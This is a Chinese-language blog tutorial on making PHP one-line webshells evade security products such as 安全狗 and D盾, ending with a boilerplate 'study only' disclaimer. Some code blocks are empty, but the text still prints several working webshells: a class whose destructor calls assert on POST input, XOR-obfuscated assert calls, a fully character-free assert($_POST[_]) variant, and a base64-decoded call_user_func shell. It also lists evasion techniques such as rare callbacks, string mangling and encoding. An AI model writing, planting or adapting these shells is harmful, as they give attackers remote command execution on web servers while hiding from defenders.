一句话木马的套路
0×01 前言
尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。
0×02 关于 eval 于 assert
关于 eval 函数在 php 给出的官方说明是
可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行
通俗的说比如你 这样是不行的 也造就了用 eval 的话达不到 assert 的灵活,但是在 php7.1 以上 assert 已经不行
关于 assert 函数
0×03 字符串变形
字符串变形多数用于 BYPASS 安全狗,相当对于 D 盾,安全狗更加重视”形”
一个特殊的变形就能绕过安全狗,看看 PHP 手册,有着很多关于操作字符串的函数
1 2 3 4 5 6 7 8 9 10 11 | ucwords() //函数把字符串中每个单词的首字符转换为大写。 ucwords() //函数把字符串中每个单词的首字符转换为大写。 ucfirst() //函数把字符串中的首字符转换为大写。 trim() //函数从字符串的两端删除空白字符和其他预定义字符。 substr_replace() //函数把字符串的一部分替换为另一个字符串 substr() //函数返回字符串的一部分。 strtr() //函数转换字符串中特定的字符。 strtoupper() //函数把字符串转换为大写。 strtolower() //函数把字符串转换为小写。 strtok() //函数把字符串分割为更小的字符串 str_rot13() //函数对字符串执行 ROT13 编码。。 |
由于 PHP 的灵活性操作字符串的函数很多,我这里就不一一列举了
用 substr_replace() 函数变形 assert 达到免杀的效果
1 2 3 4 |
其他函数类似 不一一列举了
0×04 定义函数绕过
定义一个函数把关键词分割达到 bypass 效果
1 2 3 4 5 6 |
反之
1 2 3 4 5 6 |
效果一样,这种绕过方法,对安全狗还是比较有效的 在 d 盾面前就显得小儿科了,不过后面会讲到如何用定义函数的方法来 绕过 d 盾
0×05 回调函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | call_user_func_array() call_user_func_array() call_user_func() array_filter() array_walk() array_map() registregister_shutdown_function() register_tick_function() filter_var() filter_var_array() uasort() uksort() array_reduce() array_walk() array_walk_recursive() |
回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
定义一个类
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
0×07 特殊字符干扰
特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能执行, 网上广为流传的连接符
初代版本
1 2 3 4 5 |
不过已经不能免杀了,利用适当的变形即可免杀 如
1 2 3 4 5 |
其他方法大家尽情发挥如”\r\n\t”, 函数返回,类,等等
除了连接符号 还有个命名空间的东西 \ 具体大家可以看看 php 手册
1 2 3 4 5 6 |
当然还有其他的符号熟读 PHP 手册就会有不一样的发现
0×08 数组
把执行代码放入数组中执行绕过
1 2 3 4 |
多维数组
1 2 3 4 |
0×09 类
说到类肯定要搭配上魔术方法比如 __destruct(),__construct()
直接上代码
1 2 3 4 5 6 7 8 9 10 11 | <?php class me { public $a = ''; function __destruct(){ assert("$this->a"); } } $b = new me; $b->a = $_POST['x']; ?> |
用类把函数包裹,D 盾对类查杀较弱
0×10 编码绕过
用 php 的编码函数,或者用异或等等
简单的 base64_decode, 其中因为他的正则匹配可以加入一些下划线干扰杀软
1 2 3 4 |
异或
1 2 3 4 | <?php $a= ("!"^"@").'ssert'; $a($_POST[x]); ?> |
0×11 无字符特征马
对于无特征马这里我的意思是 无字符特征
1.利用异或, 编码等方式 例如 p 神博客的
1 2 3 4 5 | <?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert'; $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST'; $___=$$__; $_($___[_]); // assert($_POST[_]);?> |
1.利用正则匹配字符 如 Tab 等 然后转换为字符
2.利用 POST 包获取关键参数执行 例如
1 2 3 4 5 6 | <?php $decrpt = $_POST['x']; $arrs = explode("|", $decrpt)[1]; $arrs = explode("|", base64_decode($arrs)); call_user_func($arrs[0],$arrs[1]); ?> |
0×12 PHP7.1 后 webshell 何去何从
在 php7.1 后面我们已经不能使用强大的 assert 函数了用 eval 将更加注重特殊的调用方法和一些字符干扰, 后期大家可能更加倾向使用大马
总结
对于安全狗杀形,d 盾杀参的思路来绕过。生僻的回调函数, 特殊的加密方式, 以及关键词的后传入都是不错的选择。
对于关键词的后传入对免杀安全狗,d 盾,河马 等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化
用户可以对传出的 post 数据进行自定义脚本加密,再由 webshell 进行解密获取参数,那么以现在的软 WAF 查杀能力
几乎为 0,安全软件也需要与时俱进了。
如有不对,还望大家斧正
行云博客 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!

浙公网安备 33010602011771号